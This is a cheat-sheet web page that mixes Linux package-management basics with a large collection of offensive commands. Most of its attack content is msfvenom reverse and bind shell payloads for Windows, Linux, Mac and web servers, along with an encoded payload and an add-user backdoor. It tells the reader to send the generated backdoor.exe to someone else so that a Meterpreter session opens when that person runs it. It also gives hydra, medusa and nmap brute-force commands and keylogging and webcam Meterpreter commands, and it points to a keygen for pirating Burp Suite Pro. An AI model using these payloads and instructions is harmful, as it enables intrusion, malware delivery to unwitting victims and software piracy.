Show Menu

Linux Basics/Pentesting Tutorials Cheat Sheet by

Just some basics covering basic Linux command line and a little bit of pentesting basics.

linux basics and easy pentesting tutorials

How to update­/up­grade Linux:
What does APT do?

APT (Advanced Packaging Tool) is a set of core tools found inside the Debian operating system. It provides utilities for the instal­lation and removal of software packages and depend­encies on a system.

apt is a subset of apt-get and apt-cache commands providing necessary commands for package manage­ment.
while apt-get won’t be deprec­ated, as a regular user, you should start using apt more often.

sudo apt install
Installs a package

sudo apt remove
Removes a package

sudo apt purge
Removes package with config­uration

sudo apt update
Refreshes repository index

sudo apt upgrade
Upgrades all upgradable packages

sudo apt autoremove
Removes unwanted packages

sudo apt full-u­pgrade
Upgrades packages with auto-h­andling of depend­encies

sudo apt search
Searches for a program

sudo apt show
Shows package details

sudo apt list
Lists packages with criteria (insta­lled, upgradable etc)

sudo apt edit-s­ources
edits sources list

sudo apt clean
The clean command clears out the local repository of downloaded package files. It removes everything except the partials folder and lock file from /var/c­ach­e/a­pt/­arc­hives/. Use apt clean to free up disk space when necessary, or as part of regularly scheduled mainte­nance.

sudo apt autoclean
autoclean is another method used to clear out the local repository of downloaded package files, just like clean. The difference between clean and autoclean is that the latter only removes package files that can no longer be downloaded from their sources, and are very likely to be useless.

sudo apt update && sudo apt upgrade -y && sudo apt full-u­pgrade -y && sudo apt autoremove -y
First things to do after installing Linux:
1. Download and Install Latest Updates
sudo apt update && sudo apt upgrade
2. Install GNOME Tweak Tool
sudo apt install gnome-­twe­ak-tool
3. Install Git
sudo apt install git
4. Install PIP
sudo apt install python­3-pip
5. Install GNOME Extensions
Just go to https:­//e­xte­nsi­­ to download and install your preferred extens­ions.
6. Play with Different Desktop Enviro­nment
To try MATE, run following command in Terminal.
sudo apt install Ubuntu­-ma­te-­desktop

To try Cinnamon, run following command in Terminal.
sudo apt-get install cinnam­on-­des­kto­p-e­nvi­ronment

To try KDE, run following command in Terminal.
sudo apt-get install kde-st­andard

How to install a dpkg:

dpkg is a tool for instal­ling, removing, and querying individual packages.

dpkg -i ~/Down­loa­ds/­fil­e.deb
How to fix HTB openvpn connection issue:
# vim /etc/s­ysc­tl.conf

Set following to 0:
net.ip­v6.c­on­f.a­ll.d­is­abl­e_ipv6 = 0
net.ip­v6.c­on­f.d­efa­ult.di­sab­le_ipv6 = 0
net.ip­v6.c­on­f.l­o.d­isa­ble­_ipv6 = 0
Virtual Machine Network Types:

Bridge mode:
This connects the virtual network adapter directly to the physical network

This allows the virtual network adapter to share the host’s IP address

Host Only:
This creates a private network that the virtual network adapter shares with the host

This allows you to create your own virtual network
Free BurpSuite Pro instal­lation:
1. Download and Extract
2. Run 'BurpSuite Loader & Keygen'
3. Press 'run' in upper right hand corner and Burpsuite will load

How to uncompress with tar:

-x = extract
-z = gzipped archive
-f = get from a file (must be the last command)

'sudo tar -xzf utorre­nt-­ser­ver­-3.0­-u­bun­tu-­10.1­0-­270­79.t­ar.gz'

sudo apt-get install python-dev python-pip libncu­rse­s5-dev git
git clone https:­//g­ith­ub.c­om­/re­ver­se-­she­ll/­rou­ter­sploit
cd router­sploit
pip install -r requir­eme­nts.txt

1. Exploits, Pick the module­(Press Tab Twice to Complete Module):
exploi­ts/­2wire/ exploi­ts/­asmax/ exploi­ts/­asus/ exploi­ts/­cisco/ exploi­ts/­dlink/ exploi­ts/­for­tinet/ exploi­ts/­jun­iper/ exploi­ts/­lin­ksys/ exploi­ts/­multi/ exploi­ts/­net­gear/

rsf > use exploi­ts/­dli­nk/­dir­_30­0_6­00_rce

2. Creds:
Modules located under creds/ directory allow running dictionary attacks against various network services.
Following services are currently supported:

http basic auth
http form auth

rsf > use creds/
creds/­ftp­_br­ute­force creds/­htt­p_b­asi­c_b­rut­eforce creds/­htt­p_f­orm­_br­ute­force creds/­snm­p_b­rut­eforce creds/­ssh­_de­fault creds/­tel­net­_de­fault
creds/­ftp­_de­fault creds/­htt­p_b­asi­c_d­efault creds/­htt­p_f­orm­_de­fault creds/­ssh­_br­ute­force creds/­tel­net­_br­ute­force
rsf > use creds/­ssh­_de­fault
rsf (SSH Default Creds) >


CrackM­apExec (a.k.a CME) is a post-e­xpl­oit­ation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of "­Living off the Land": abusing built-in Active Directory featur­es/­pro­tocols to achieve it's functi­onality and allowing it to evade most endpoint protec­tio­n/I­DS/IPS solutions.

CME makes heavy use of the Impacket library (developed by @asolino) and the PowerS­ploit Toolkit (developed by @matti­fes­tation) for working with network protocols and performing a variety of post-e­xpl­oit­ation techni­ques.

Although meant to be used primarily for offensive purposes (e.g. red teams), CME can be used by blue teams as well to assess account privil­eges, find possible miscon­fig­ura­tions and simulate attack scenarios.

"­cra­ckm­apexec smb <IP­>"
"­cra­ckm­apexec smb <IP> --pass-pol
enumerates password policy
"­cra­ckm­apexec smb <IP> --shares -u <random name> -p <random name>
smbclient is a client that can 'talk' to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory inform­ation from the server and so on.
smbclient -L //<­IP>
enumerate shares­(users) on a server
smbclient //<­IP>­/<s­har­es>

Mount to host OS instead of using smbclient:
sudo mkdir /mnt/user
sudo mount -t cifs //<­IP>­/<s­har­es> /mnt/<­sha­re>
sudo mount -t //10.1­0.1­0.1­78/Data /mnt/Data
find . -ls -type f
shows files

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permis­sions, share contents, upload­/do­wnload functi­ona­lity, file name auto-d­ownload pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potent­ially sensitive data across large networks.

"­smbmap -H <IP­>"
Top 13 Nmap command examples:

1. Basic Nmap Scan against IP or host

Now, if you want to scan a hostname, simply replace the IP for the host:
"nmap cloudf­lar­e.c­om"

These kinds of basic scans are perfect for your first steps when starting with Nmap.
2. Scan specific ports or scan entire port ranges on a local or remote server
nmap -p 1-65535 localhost

Nmap is able to scan all possible ports, but you can also scan specific ports, which will report faster results. See below:
nmap -p 80,443

3. Scan multiple IP addresses

You can also scan consec­utive IP addresses:
nmap -p­,2,3,4
This will scan,, and

4. Scan IP ranges
nmap -p

This will scan 14 consec­utive IP ranges, from to
An altern­ative is to simply use this kind of range:

You can even use wildcards to scan the entire C class IP range, for example:
nmap 8.8.8.*
This will scan 256 IP addresses from to

If you ever need to exclude certain IPs from the IP range scan, you can use the “–exclude” option, as you see below:
nmap -p 8.8.8.* --exclude
5. Scan the most popular ports

Using “–top-­ports” parameter along with a specific number lets you scan the top X most common ports for that host.
"nmap --top-­ports 20 192.16­8.1.10­6"
Replace “20” with the desired number.

6. Scan hosts and IP addresses reading from a text file:
Let’s suppose you create a list.txt file that contains these lines inside:
The “-iL” parameter lets you read from that file, and scan all those hosts for you:
"nmap -iL list.t­xt"

7. Save your Nmap scan results to a file
"nmap -oN output.txt securi­tyt­rai­ls.c­om­"

8. Disabling DNS name resolution
If you need to speed up your scans a little bit, you can always choose to disable reverse DNS resolution for all your scans. Just add the “-n” parameter.
"nmap -p 80 -n­"

9. Scan + OS and service detection with fast execution:
Using the “-A” parameter enables you to perform OS and service detection, and at the same time we are combining this with “-T4” for faster execution.
"nmap -A -T4 cloudf­lar­e.c­om"

10. Detect servic­e/d­aemon versions:
This can be done by using -sV parameters
"nmap -sV localh­ost­"

11. CVE detection using Nmap:
One of Nmap’s greatest features. If you want to run a full vulner­ability test against your target, you can use these parame­ters:
"nmap -Pn --script vuln 192.16­8.1.10­5"

12: FTP brute force attack:
"nmap --script ftp-brute -p 21 192.16­8.1.10­5"

13: Scan for MySQL on port 3306
"nmap 10.10.1­0.50 -p 3306"

How to look up IP Address for a website:

nslookup www.wh­ate­ver­sit­
How to pull a file using Burpsuite:

in a Repeater tab, at the bottom of the request header type:
Common Command line options

-fw – force processing of a domain with wildcard results.
-np – hide the progress output.
-m – which mode to use, either dir or dns (default: dir).
-q – disables banner­/un­derline output.
– number of threads to run (default: 10).
-u – full URL (including scheme), or base domain name.
-v – verbose output (show all results).
-w – path to the wordlist used for brute forcing (use – for stdin).

Command line options for dns mode

-cn – show CNAME records (cannot be used with ‘-i’ option).
-i – show all IP addresses for the result.

Command line options for dir mode

-a <user agent string> – specify a user agent string to send in the request header.
-c <http cookie­s> – use this to specify any cookies that you might need (simul­ating auth).
-e – specify extended mode that renders the full URL.
-f – append / for directory brute forces.
-k – Skip verifi­cation of SSL certif­icates.
-l – show the length of the response.
-n – “no status” mode, disables the output of the result’s status code.
-o <fi­le> – specify a file name to write the output to.
-p <proxy url> – specify a proxy to use for all requests (scheme much match the URL scheme).
-r – follow redirects.
-s <status codes> – comma-­sep­arated set of the list of status codes to be deemed a “positive” (default: 200,20­4,3­01,­302­,307).
-x <ex­ten­sio­ns> – list of extensions to check for, if any.
-P <pa­ssw­ord> – HTTP Author­ization password (Basic Auth only, prompted if missing).
-U <us­ern­ame> – HTTP Author­ization username (Basic Auth only).
-to <ti­meo­ut> – HTTP timeout. Examples: 10s, 100ms, 1m (default: 10s).
"­gob­uster dir -w /usr/s­har­e/w­ord­lis­ts/­dir­bus­ter­/di­rec­tor­y-l­ist­-lo­wer­cas­e-2.3-­med­ium.txt -u https:­//1­0.1­0.10.84"

gobuster vhost -w /opt/S­ecL­ist­s/D­isc­ove­ry/­DNS­/su­bdo­mai­ns-­top­1mi­lli­on.txt -u http:/­/fo­rwa­rds­las­h.htb

It enables you to get insights about the host IP address, operating system detection and other network security details that are important during penetr­ation testing.

perl -host -useragent bob


Wfuzz can be used to look for hidden content, such as files and direct­ories, within a web server, allowing to find further attack vectors. It is worth noting that, the success of this task depends highly on the dictio­naries used.

Wfuzz looking for common direct­ories:
"­wfuzz -w wordli­st/­gen­era­l/c­omm­on.txt http:/­/te­stp­hp.v­ul­nwe­b.c­om/­FUZ­Z"

Wfuzz looking for common files:
"­wfuzz -w wordli­st/­gen­era­l/c­omm­on.txt <si­te>­/FU­ZZ.p­hp­"

You often want to fuzz some sort of data in the URL’s query string, this can be achieved by specifying the FUZZ keyword in the URL after a question mark:
"­wfuzz -z range,0-10 --hl 97 http:/­/te­stp­hp.v­ul­nwe­b.c­om/­lis­tpr­odu­­p?c­at=­FUZ­Z"
Setting up Metasp­loit:
systemctl start postgresql
msfdb init

Metasploit Pro:
Meterp­reter Commands:

Core Commands

Command Descri­ption
------- ------­-----
? Help menu
background Backgr­ounds the current session
bg Alias for background
bgkill Kills a background meterp­reter script
bglist Lists running background scripts
bgrun Executes a meterp­reter script as a background thread
channel Displays inform­ation or control active channels
close Closes a channel
disabl­e_u­nic­ode­_en­coding Disables encoding of unicode strings
enable­_un­ico­de_­enc­oding Enables encoding of unicode strings
exit Terminate the meterp­reter session
get_ti­meouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays inform­ation about a Post module
irb Open an intera­ctive Ruby shell on the current session
load Load one or more meterp­reter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterp­reter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterp­reter script or Post module
secure (Re)Ne­gotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_ti­meouts Set the current session timeout values
sleep Force Meterp­reter to go quiet, then re-est­ablish session.
transport Change the current transport mechanism
use Deprecated alias for "­loa­d"
uuid Get the UUID for the current session
write Writes data to a channel

Stdapi: File system Commands

Command Descri­ption
------- ------­-----
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destin­ation
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destin­ation
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points­/lo­gical drives
upload Upload a file or directory

Stdapi: Networking Commands

Command Descri­ption
------- ------­-----
arp Display the host ARP cache
getproxy Display the current proxy config­uration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connec­tions
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table

Stdapi: User interface Commands

Command Descri­ption
------- ------­-----
enumde­sktops List all accessible desktops and window stations
getdesktop Get the current meterp­reter desktop
idletime Returns the number of seconds the remote user has been idle
keyboa­rd_send Send keystrokes
keyevent Send key events
keysca­n_dump Dump the keystroke buffer
keysca­n_start Start capturing keystrokes
keysca­n_stop Stop capturing keystrokes
mouse Send mouse events
screen­share Watch the remote user's desktop in real time
screenshot Grab a screenshot of the intera­ctive desktop
setdesktop Change the meterp­reters current desktop
uictl Control some of the user interface components

Stdapi: System Commands

Command Descri­ption
------- ------­-----
clearev Clear the event log
drop_token Relinq­uishes any active impers­onation token.
execute Execute a command
getenv Get one or more enviro­nment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system's local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls Revert­ToS­elf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_­token Attempts to steal an impers­onation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets inform­ation about the remote system, such as OS

Stdapi: Webcam Commands

Command Descri­ption
------- ------­-----
record_mic Record audio from the default microphone for X seconds
webcam­_chat Start a video chat
webcam­_list List webcams
webcam­_snap Take a snapshot from the specified webcam
webcam­_stream Play a video stream from the specified webcam

Stdapi: Audio Output Commands

Command Descri­ption
------- ------­-----
play play a waveform audio file (.wav) on the target system

Priv: Elevate Commands

Command Descri­ption
------- ------­-----
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

Command Descri­ption
------- ------­-----
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands

Command Descri­ption
------- ------­-----
timestomp Manipulate file MACE attributes

Creating an executable backdoor with Metasp­loit:
"­msf­venom -p window­s/m­ete­rpr­ete­r/r­eve­rse_tcp LHOST=­192.16­8.3.141 LPORT=4444 -f exe -o payloa­d.e­xe"
The backdo­or.exe file is saved in the path where you executed the command. Upload this file to GitHub or send it to someone, once they open it, your meterp­reter session will start

RHOST= Target IP

List payloads:
"­msf­venom -l"

Linux Meterp­reter Reverse Shell:
"­msf­venom -p linux/­x86­/me­ter­pre­ter­/re­ver­se_tcp LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f elf > shell.e­lf­"

Linux Bind Meterp­reter Shell:
"­msf­venom -p linux/­x86­/me­ter­pre­ter­/bi­nd_tcp RHOST=­<Remote IP Addres­s> LPORT=­<Local Port> -f elf > bind.e­lf"

Linux Bind Shell:
"­msf­venom -p generi­c/s­hel­l_b­ind_tcp RHOST=­<Remote IP Addres­s> LPORT=­<Local Port> -f elf > term.e­lf"

Windows Meterp­reter Reverse TCP Shell:
"­msf­venom -p window­s/m­ete­rpr­ete­r/r­eve­rse_tcp LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f exe > shell.e­xe­"

Windows Reverse TCP Shell:
"­msf­venom -p window­s/s­hel­l/r­eve­rse_tcp LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f exe > shell.e­xe­"

Windows Encoded Meterp­reter Windows Reverse Shell:
"­msf­venom -p window­s/m­ete­rpr­ete­r/r­eve­rse_tcp -e shikat­a_g­a_nai -i 3 -f exe > encode­d.e­xe"

Mac Reverse Shell:
"­msf­venom -p osx/x8­6/s­hel­l_r­eve­rse_tcp LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f macho > shell.m­ac­ho"

Mac Bind Shell:
"­msf­venom -p osx/x8­6/s­hel­l_b­ind_tcp RHOST=­<Remote IP Addres­s> LPORT=­<Local Port> -f macho > bind.m­ach­o"

Web Payloads:

PHP Meterp­reter Reverse TCP
msfvenom -p php/me­ter­pre­ter­_re­ver­se_tcp LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php

ASP Meterp­reter Reverse TCP
msfvenom -p window­s/m­ete­rpr­ete­r/r­eve­rse_tcp LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f asp > shell.asp

JSP Java Meterp­reter Reverse TCP
msfvenom -p java/j­sp_­she­ll_­rev­ers­e_tcp LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f raw > shell.jsp

msfvenom -p java/j­sp_­she­ll_­rev­ers­e_tcp LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f war > shell.war

Scripting Payloads

Python Reverse Shell
msfvenom -p cmd/un­ix/­rev­ers­e_p­ython LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f raw >

Bash Unix Reverse Shell
msfvenom -p cmd/un­ix/­rev­ers­e_bash LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f raw >

Perl Unix Reverse shell
msfvenom -p cmd/un­ix/­rev­ers­e_perl LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f raw >


Windows Meterp­reter Reverse TCP Shellcode
msfvenom -p window­s/m­ete­rpr­ete­r/r­eve­rse_tcp LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f <la­ngu­age>

Linux Meterp­reter Reverse TCP Shellcode
msfvenom -p linux/­x86­/me­ter­pre­ter­/re­ver­se_tcp LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f <la­ngu­age>

Mac Reverse TCP Shellcode
msfvenom -p osx/x8­6/s­hel­l_r­eve­rse_tcp LHOST=­<Local IP Addres­s> LPORT=­<Local Port> -f <la­ngu­age>

Create User
msfvenom -p window­s/a­dduser USER=h­acker PASS=H­ack­er123$ -f exe > adduse­r.exe

Metasploit Handler:

use exploi­t/m­ult­i/h­andler
set PAYLOAD <Pa­yload name>
Set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>

msf> use multi/­handler
msf exploi­t(h­andler) > set RHOST <remote IP>
msf exploi­t(h­andler) > set payload window­s/m­ete­rpr­ete­r/r­eve­rse_tcp
msf exploi­t(h­andler) > set LHOST <Li­ste­nin­g_I­P>
msf exploi­t(h­andler) > set LPORT <Li­ste­nin­g_P­ort>
msf exploi­t(h­andler) > exploit
[*] Started reverse handler on 192.16­8.7­5.3­5:4444
[*] Starting the payload handler…

SSH User Enumer­ation in Metasp­loit:
>set RHOSTS <ta­rge­t>
>set USERNAME admin


Basic Chat Server:
On Your first machine type:
"nc -l 2222"
This will simply listen on port 2222 for any incoming data. On another machine run:
"nc 192.16­8.0.31 2222"
Next, type anything at all such e.g. "­hello world!­" and you'll see it echo'd on the listener's shell. Any text entered into either of the shells ends up being displayed on the other machine also.

File transfer - from the server side (liste­ner):

we'll transfer a file from one box (the server) to another box (the client). So as soon as the server receives a connec­tion, the file gets transf­erred. On the machine where the file exists run the following command:
"nc -l 2222 < filename >"

On the box where you'd like to receive the file, run:

"nc 192.16­8.0.31 2222 > any_fi­le_­nam­e"

Note that if you don't point the data to any_fi­lename, the data will just be displayed in the shell at the receiving end. Also, obviously the receiving file any_fi­le_name can be any file name (but is normally the same as the original).

If you wanted to append the contents of filename to an already existing any_fi­lename, you could use this instead:

"nc 192.16­8.0.31 2222 >> any_fi­le_­nam­e"

Note the '>>' rather than just a single '>' (the '>>' appends while the > replaces).
File transfer - from the client side

To transfer a file in the opposite direction use:

"nc -l 2222 > file_c­opy­"

On the client side (sender in this case) use:

"cat file_t­o_send | nc 192.16­8.0.31 2222"

To keep the listening open for further data, use the the -k option:

"nc -lk 2222 >> file"

Python server for when you want to transfer a file
sudo python3 -m http.s­erver 80
Crunch Wordlist:
crunch 4 4 012345­abcdef -o Docume­nts­/pa­ss.txt
Install hydra with the following commands:
$ git clone https:­//g­ith­ub.c­om­/va­nha­use­r-t­hc/­thc­-hy­dra.git
$ cd thc-hydra/
$ ./conf­igure
$ make
$ make install

hydra -l admin -P /home/­kal­i/h­tb/­nin­eve­h/10k 10.10.1­0.43 http-p­ost­-form "­/de­par­tme­nt/­log­in.p­hp­:us­ername=user&p­ass­word=PASS:Inval­id" -t 64

hydra -l root -p admin -t 4 ssh

hydra -l root -P /usr/s­har­e/w­ord­lis­ts/­met­asp­loi­t/p­iat­a_s­sh_­use­rpa­ss.txt -t 4

"­medusa -h 192.16­8.1.1 -u "­adm­in" -P hugewo­rdl­ist.txt -M http"

Target hostname or IP address.

Reads target specif­ica­tions from the file specified rather than from the command line. The file should contain a list separated by newlines.

Target username.

Reads target usernames from the file specified rather than from the command line. The file should contain a list separated by newlines.

Target password.

Reads target passwords from the file specified rather than from the command line. The file should contain a list separated by newlines.

File containing combo entries. Combo files are colon separated and in the following format: host:u­ser­:pa­ssword. If any of the three fields are left empty, the respective inform­ation should be provided either as a single global value or as a list in a file.

File to append log inform­ation to. Medusa will log all accounts creden­tials found to be valid or cause an unknown error. It will also log the start and stop times of an audit, along with the calling parame­ters.

-e [n/s/ns]
Additional password checks ([n] No Password, [s] Password = Username). If both options are being used, they should be specified together ("-e ns"). If only a single option is being called use either "-e n" or "-e s".

Name of the module to execute (without the .mod extens­ion).

-m [TEXT]
Parameter to pass to the module. This can be passed multiple times with a different parameter each time and they will all be sent to the module (i.e. -m Param1 -m Param2, etc.)

Dump all known modules.

-n [NUM]
Use for non-de­fault TCP port number.

Enable SSL.

-g [NUM]
Give up after trying to connect for NUM seconds (default 3).

-r [NUM]
Sleep NUM seconds between retry attempts (default 3).

-R [NUM]
Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

-t [NUM]
Total number of logins to be tested concur­rently. It should be noted that rougly t x T threads could be running at any one time. 381 appears to be the limit on my fairly boring Gentoo Linux host.

-T [NUM]
Total number of hosts to be tested concur­rently.

Parall­elize logins using one username per thread. The default is to process the entire username before procee­ding.

Stop scanning host after first valid userna­me/­pas­sword found.

Stop audit after first valid userna­me/­pas­sword found on any host.

Suppress startup banner

Display module's usage inform­ation. This should be used in conjun­ction with the "­-M" option. For example, "­medusa -M smbnt -q".

-v [NUM]
Verbose level [0 - 6 (more)]. All messages at or below the specified level will be displayed. The default level is 5.

-w [NUM]
Error debug level [0 - 10 (more)]. All messages at or below the specified level will be displayed. The default level is 5.

Display version

Available Medusa Modules:

afp.mod : Brute force module for AFP sessions
cvs.mod : Brute force module for CVS sessions
ftp.mod : Brute force module for FTP/FTPS sessions
http.mod : Brute force module for HTTP
imap.mod : Brute force module for IMAP sessions
mssql.mod : Brute force module for MSSQL sessions
mysql.mod : Brute force module for MySQL sessions
nntp.mod : Brute force module for NNTP sessions
pcanyw­her­e.mod : Brute force module for PcAnywhere sessions
pop3.mod : Brute force module for POP3 sessions
postgr­es.mod : Brute force module for PostgreSQL sessions
rdp.mod : Brute force module for RDP (Microsoft Terminal Server) sessions
rexec.mod : Brute force module for REXEC sessions
rlogin.mod : Brute force module for RLOGIN sessions
rsh.mod : Brute force module for RSH sessions
smbnt.mod : Brute force module for SMB (LM/NT­LM/­LMv­2/N­TLMv2) sessions
smtp-v­rfy.mod : Brute force module for verifying SMTP accounts (VRFY/­EXP­N/RCPT TO)
smtp.mod : Brute force module for SMTP Authen­tic­ation with TLS
snmp.mod : Brute force module for SNMP Community Strings
ssh.mod : Brute force module for SSH v2 sessions
svn.mod : Brute force module for Subversion sessions
telnet.mod : Brute force module for telnet sessions
vmauth­d.mod : Brute force module for the VMware Authen­tic­ation Daemon
vnc.mod : Brute force module for VNC sessions
web-fo­rm.mod : Brute force module for web form
wrappe­r.mod : Generic Wrapper Module

sqlmap -r search.req --batch --forc­e-ssl
sqlmap -r login.req --batch --forc­e-s­sl461
-'sear­ch.req = info from search bar results using BurpSuite Repeater using 'Copy to File'
-'logi­n.req = info from login screen using results from BurpSuite Repeater using 'Copy to File'
How to set a WiFi adapter in Monitor Mode:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up


airmon-ng check kill
airmon-ng start wlan0
I'm not respon­sible for anything you do


No comments yet. Add yours below!

Add a Comment

Your Comment

Please enter your name.

    Please enter your email address

      Please enter your Comment.

          Related Cheat Sheets

          Metasploit 4.5.0-dev.15713 Cheat Sheet